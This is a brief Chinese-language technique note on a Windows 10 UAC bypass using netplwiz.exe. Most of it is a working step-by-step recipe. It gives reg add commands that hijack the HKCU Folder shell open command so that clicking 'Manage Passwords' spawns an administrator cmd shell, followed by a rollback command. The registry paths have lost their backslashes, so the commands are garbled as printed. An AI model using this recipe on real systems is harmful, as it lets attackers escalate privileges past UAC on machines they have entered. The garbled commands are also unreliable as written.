Windows 10 GUI UAC绕过(netplwiz.exe)
- 类型:GUI Hack
- 方法:注册表项操作
- 目标:system32 etplwiz.exe
- 组件:攻击者定义
- Works from: window 10
HKCUSoftwareClassesFoldershellopencommand
单击netplwiz.exe中的“管理密码”按钮时调用
产生步骤:
运行命令
reg add “HKCUSoftwareClassesFoldershellopencommand” /d “cmd.exe /c cmd.exe” /f && reg add HKCUSoftwareClassesFoldershellopencommand /v “DelegateExecute” /f
在cmd中运行netplwiz.exe。
选择“ 高级 ”选项卡,然后单击“ 管理密码 ”按钮。
然后您将获得Administrator Shell。
回滚
reg delete “HKCUSoftwareClassesFoldershellopencommand” /f